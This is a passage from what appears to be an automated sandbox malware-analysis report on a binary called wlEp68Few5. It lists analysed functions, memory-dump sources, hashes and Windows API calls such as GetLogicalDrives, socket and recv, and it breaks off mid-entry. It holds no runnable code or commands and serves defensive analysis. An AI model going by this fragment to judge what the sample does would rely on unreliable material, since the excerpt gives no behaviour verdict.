                                                      • Instruction ID: 9eb58c906a0c743a2049dfd77be159d989a659a37321092145237ac7cfb82ded
                                                      • Opcode Fuzzy Hash: e7a66cfad03ff5b62d21242f85fd9b6bb33a32249d73f237e268671698e5acca
                                                      • Instruction Fuzzy Hash: E771FFFB16C121BCA20685952B54BFA6B6EE4CB730732847BF403D65C2E3D54B4E62B1
                                                      Function 07100B22 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 367COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: aa843b6e3ab88bb086cbf9a53e0dfa93be4f4f8c9d86f24ca5b3a8a2b1b26142
                                                      • Instruction ID: aebb1b0a23aae08ee1db9e67bb1c58c97989d60fb7ebad27e606da428f65d38c
                                                      • Opcode Fuzzy Hash: aa843b6e3ab88bb086cbf9a53e0dfa93be4f4f8c9d86f24ca5b3a8a2b1b26142
                                                      • Instruction Fuzzy Hash: B5711DFB16C111BDA20685812B54BFA6B7EE5CB730732847BF403D61C2E3E54B4A62B1
                                                      Function 07100BA5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 364COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 2144fffb441ecf3db6fe9f89607f6ded868faf79a7adb9274262567174e00af2
                                                      • Instruction ID: f1f4b33f3169d0eaa163fcc0326ed1bc8db8513fac0949c1acbbf1092dd0a0ec
                                                      • Opcode Fuzzy Hash: 2144fffb441ecf3db6fe9f89607f6ded868faf79a7adb9274262567174e00af2
                                                      • Instruction Fuzzy Hash: 6E71FDFB16C121BDA20685852B54BFA6B7EE4CB630732847BF403D65C2E3D54B4E62B1
                                                      Function 07100B47 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 360COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 72630d4aefb80b19fb61f9dda9d8dbb8fb750f594963ccbdd1107692e33a8301
                                                      • Instruction ID: 854a3a2ad7bf3793940ca70a6c58b9c971377515c333b4b2d490395df21dd953
                                                      • Opcode Fuzzy Hash: 72630d4aefb80b19fb61f9dda9d8dbb8fb750f594963ccbdd1107692e33a8301
                                                      • Instruction Fuzzy Hash: CD71FEFB16C121BDA20685852B54BFA6B7EE4CB630732847BF403D65C2E3D54B4E62B1
                                                      Function 07100B5D Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 357COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 916d0cda7c3f69f3e664955e2ad09bc81c387d81fcdfa2dc34364da4a234d738
                                                      • Instruction ID: a0b724b908060ee986f637956395f203f89105b0835fad867c4928a4e0527aeb
                                                      • Opcode Fuzzy Hash: 916d0cda7c3f69f3e664955e2ad09bc81c387d81fcdfa2dc34364da4a234d738
                                                      • Instruction Fuzzy Hash: 3F61DCFB16C121BDA20685452B54BFA6B6EE4CB630732847BF403D65C2E3D54B4E62B2
                                                      Function 07100B70 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 353COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 15f569921a3d9e8fa26865504233bdf5d8d1a3c907eb80aee8f60ae3e47f1b28
                                                      • Instruction ID: 92b55426639ca414015440b00dcc1ff175ccb7d772e6e9eb577aa0f23183e1c5
                                                      • Opcode Fuzzy Hash: 15f569921a3d9e8fa26865504233bdf5d8d1a3c907eb80aee8f60ae3e47f1b28
                                                      • Instruction Fuzzy Hash: A2610BFB16C111BDA20685852B54BFA6B7EE4CB630732847BF403D65C2E3D54B4E62B2
                                                      Function 07100B90 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 343COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: bc5d454e85271fce65a6165413b5aaae17347cd368ffaa823a86a989bb6c554b
                                                      • Instruction ID: 86f1986092848e529fd278358666321a80b1e6e87a52cde757f10ba8a2a88e50
                                                      • Opcode Fuzzy Hash: bc5d454e85271fce65a6165413b5aaae17347cd368ffaa823a86a989bb6c554b
                                                      • Instruction Fuzzy Hash: F861FEFB16C111BCB20685912B54AFA6B7EE4CB630732847BF403D55C2E3D54A4E62B1
                                                      Function 07100BD2 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 310COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 999431828-246913015
                                                      • Opcode ID: ab635a18307837cb320f56b3e43cd6998f007d1d0d2c33e18acf0b05b8a636f8
                                                      • Instruction ID: c429d846620c6d7d81e8fd5b9540ab4e5001eaa4b104f5d76bcc88750841a79b
                                                      • Opcode Fuzzy Hash: ab635a18307837cb320f56b3e43cd6998f007d1d0d2c33e18acf0b05b8a636f8
                                                      • Instruction Fuzzy Hash: DB51AAFB16C111BDB10685852B54AFA6B7EE4CB630732847BF403D65C2E3D54A4E61B1
                                                      Function 07100C25 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 999431828-246913015
                                                      • Opcode ID: ca21b6dcc2b2e2258b17c0d914ffdab806417a319fe33c040e3fdcb254fe99cd
                                                      • Instruction ID: fd4e8cf1cc63f011899a886a83dffdc648b8c2bc032d900367e332b71e928d36
                                                      • Opcode Fuzzy Hash: ca21b6dcc2b2e2258b17c0d914ffdab806417a319fe33c040e3fdcb254fe99cd
                                                      • Instruction Fuzzy Hash: 0851CCFB26C111BDB10681952B54BFA6B6EE4CB630732843BF403D15C2E3D54A4E61B1
                                                      Function 00477770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                      • API String ID: 1507349165-640788491
                                                      • Opcode ID: bb7b28688b551f74e8fba55512457c719bd43040049dddf35eb908b51c8f8df8
                                                      • Instruction ID: 83f7fbee43889ab58adb5069dde32c567514b8460479fb828f8fc61ff79ae83d
                                                      • Opcode Fuzzy Hash: bb7b28688b551f74e8fba55512457c719bd43040049dddf35eb908b51c8f8df8
                                                      • Instruction Fuzzy Hash: 9E115BF4A48314BBD120D715AC4AE7B3B9CDBC6B1CF81852DB80C53342E165AC0581B2
                                                      Function 004775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                      • API String ID: 98920635-842387772
                                                      • Opcode ID: 45ca9927a0c8808b13b3df5d0da242996b30d94ed469a32e82b6b28852cae0ea
                                                      • Instruction ID: 5baca96810477c575b9cad7dc3ea1eb6ba02d464b4afa73a3aa9e3835cc7d3f5
                                                      • Opcode Fuzzy Hash: 45ca9927a0c8808b13b3df5d0da242996b30d94ed469a32e82b6b28852cae0ea
                                                      • Instruction Fuzzy Hash: FA118CB2A812216BDA205769BC07EEB3B98DFC1738F458925F808933D3E2568951C2E1
                                                      Function 07100C37 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 276COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$`BJ^
                                                      • API String ID: 999431828-225891231
                                                      • Opcode ID: 9397e85d5d35c57ebed9b84770fb90f41bd33921f1ace622a8ac3bd27de371ed
                                                      • Instruction ID: fe5d636a8a3f400b6f227f48eddfb6f9bb81b15106951ab0b41a87bc2752d508
                                                      • Opcode Fuzzy Hash: 9397e85d5d35c57ebed9b84770fb90f41bd33921f1ace622a8ac3bd27de371ed
                                                      • Instruction Fuzzy Hash: E551BEFB26C121BDB10681562B54AFA6B7EE4CB630732843BF403D65C2E7D54E4E61B1
                                                      Function 07100CDA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 252COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07100D24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$`BJ^
                                                      • API String ID: 999431828-225891231
                                                      • Opcode ID: ad51f7f1b04bd075922d7183180616ce6d0cbaf037f247f71eccbd928c50896a
                                                      • Instruction ID: 9c9b2527cd013b260321e5274d21f3b76a00d0f45039ea7db003d0e599f051e3
                                                      • Opcode Fuzzy Hash: ad51f7f1b04bd075922d7183180616ce6d0cbaf037f247f71eccbd928c50896a
                                                      • Instruction Fuzzy Hash: 1A41CDFB16C111BDA10681952B54BFA6B6EE4CB630732847BF403D25C2E7D58E4E62B1
                                                      Function 07100C71 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$`BJ^
                                                      • API String ID: 999431828-225891231
                                                      • Opcode ID: 629779167d08bdce2e99f0b4c5c38eeba56cdeae93aab700d18aa8a2e270248f
                                                      • Instruction ID: 0c3288a3b6885d4d024c65d26f37c9a67640b31ea01e67f479c078636d6c86c9
                                                      • Opcode Fuzzy Hash: 629779167d08bdce2e99f0b4c5c38eeba56cdeae93aab700d18aa8a2e270248f
                                                      • Instruction Fuzzy Hash: 8C41D0FB16C111BDB10681952B54AFA6B7EE4CB630732847BF403D65C2E3D58E4E62B1
                                                      Function 07100C85 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$`BJ^
                                                      • API String ID: 999431828-225891231
                                                      • Opcode ID: 1a644d1871d3b05cfbe8190c52900851b04ad11f4c331d87a7b5e62e2ad9ec43
                                                      • Instruction ID: cef52b1b471e90966032353717d32c4f3b52502672790ff858b517dc244b45d7
                                                      • Opcode Fuzzy Hash: 1a644d1871d3b05cfbe8190c52900851b04ad11f4c331d87a7b5e62e2ad9ec43
                                                      • Instruction Fuzzy Hash: 7951F2FB25C111BDB20681552B54AFA6B7EE5CB630732847BF403D61C2E3D58E0E62B2
                                                      Function 07100CC2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 239COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07100D24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$`BJ^
                                                      • API String ID: 999431828-225891231
                                                      • Opcode ID: 1ff16eec138a2bb91701f0231b0a382353c6a08eb1ec84861301c897e16ce813
                                                      • Instruction ID: 785e5f3e77e2bdcf510d53155f32764429ced723df42f9d555578644a6c36c20
                                                      • Opcode Fuzzy Hash: 1ff16eec138a2bb91701f0231b0a382353c6a08eb1ec84861301c897e16ce813
                                                      • Instruction Fuzzy Hash: 5041AEFB25C111BD710681952B58AFA6B7EE5CB630732883BF403E14C2E3D58E4E61B1
                                                      Function 07100D0C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07100D24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$`BJ^
                                                      • API String ID: 999431828-225891231
                                                      • Opcode ID: 6bb12b6c50c2082aec49d282b35d68fe6c3149fefcf1055f53d45d84f89a6007
                                                      • Instruction ID: 1235235d07fe684bcf408c98e92c73c956ea5c49a0cef9e15b4d65dec0bceb13
                                                      • Opcode Fuzzy Hash: 6bb12b6c50c2082aec49d282b35d68fe6c3149fefcf1055f53d45d84f89a6007
                                                      • Instruction Fuzzy Hash: AF418CFB25C111BD710681952B54AFA6B7EE5CB630732883BF403E15C2E7D58E4E62B1
                                                      Function 07100CBC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 235COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07100D24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$`BJ^
                                                      • API String ID: 999431828-225891231
                                                      • Opcode ID: 685af1c99832c4c6e4b019553e89f75abc37fdad29e9f8d8c7e1b7fc75c00115
                                                      • Instruction ID: 23971915b84946a89c27de91afab72cb32eb4cc5784c925d55f3c96ab71527d4
                                                      • Opcode Fuzzy Hash: 685af1c99832c4c6e4b019553e89f75abc37fdad29e9f8d8c7e1b7fc75c00115
                                                      • Instruction Fuzzy Hash: 4B419DFB25C111BD710681952B54AFA6B7EE5CB630732843BF403E15C2E3D58E4E62B1
                                                      Function 004AA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 004AA1C7
                                                      Strings
                                                      • getsockname() failed with errno %d: %s, xrefs: 004AA1F0
                                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 004AA23B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3358416759-2605427207
                                                      • Opcode ID: 5b0458fc44ef97d47fe57f22694db8ac34b9e407cf5561e941176476d5a9d12c
                                                      • Instruction ID: cfdf8a93c90f574898fd56da375543de5d9438603299f03a59626a9fa926085a
                                                      • Opcode Fuzzy Hash: 5b0458fc44ef97d47fe57f22694db8ac34b9e407cf5561e941176476d5a9d12c
                                                      • Instruction Fuzzy Hash: 60210C318086807AF7229B19EC46FE773BCEF92328F000655F99853151FB36699587E7
                                                      Function 0048D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202), ref: 0048D65B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: if_nametoindex$iphlpapi.dll
                                                      • API String ID: 724789610-3097795196
                                                      • Opcode ID: 83997c92a62ec67f8325940240a7583cb722ba41a35a72e1532768d7e0cfe747
                                                      • Instruction ID: be93074d29ae860ebf91775eea49014b4feb188205ab800049e94be80f000995
                                                      • Opcode Fuzzy Hash: 83997c92a62ec67f8325940240a7583cb722ba41a35a72e1532768d7e0cfe747
                                                      • Instruction Fuzzy Hash: F7012690D423455AFB11BB389D2B76B27A06B95308F490D7AD848A53C3F76DC98AC392
                                                      Function 0053AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0053AB9A
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0053ABE3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocketsocket
                                                      • String ID:
                                                      • API String ID: 416004797-0
                                                      • Opcode ID: 6e12e911de477f64f73e1a9ca6ee895d5c5bd1cff4b1685105b183aa48b31d43
